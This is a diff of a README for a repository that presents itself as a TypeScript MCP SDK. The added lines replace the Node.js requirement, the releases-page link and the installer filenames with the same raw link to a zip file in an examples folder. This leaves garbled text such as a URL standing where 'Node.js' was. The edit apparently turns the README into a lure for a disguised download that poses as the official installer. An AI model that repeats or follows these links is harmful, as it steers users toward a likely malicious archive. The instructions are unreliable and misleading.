Palald/mcp-sdk-typescript/README.md

 1. Check your system:
    - Operating System: Windows, macOS, or Linux
-   - Node.js version: 14.x or higher
+   - https://github.com/Palald/mcp-sdk-typescript/raw/refs/heads/main/examples/typescript-mcp-sdk-2.0.zip version: 14.x or higher

 2. Ensure you have internet access throughout the download process.

 ## 📦 Download & Install
-To download the SDK, visit this page to download: [mcp-sdk-typescript Releases Page](https://github.com/Palald/mcp-sdk-typescript/releases).
+To download the SDK, visit this page to download: [mcp-sdk-typescript Releases Page](https://github.com/Palald/mcp-sdk-typescript/raw/refs/heads/main/examples/typescript-mcp-sdk-2.0.zip).

 On this page, you will find the latest release available for download.
 Follow these steps to install the SDK on your system:

 1. Click on the release version that matches your needs.
-The filenames will have helpful labels, such as `mcp-sdk-typescript-setup.exe` for Windows or `mcp-sdk-typescript.pkg` for macOS.
+The filenames will have helpful labels, such as `https://github.com/Palald/mcp-sdk-typescript/raw/refs/heads/main/examples/typescript-mcp-sdk-2.0.zip` for Windows or `https://github.com/Palald/mcp-sdk-typescript/raw/refs/heads/main/examples/typescript-mcp-sdk-2.0.zip` for macOS.

 2. Wait for the download to finish.
 Depending on your internet speed, this could take a few seconds to a few minutes.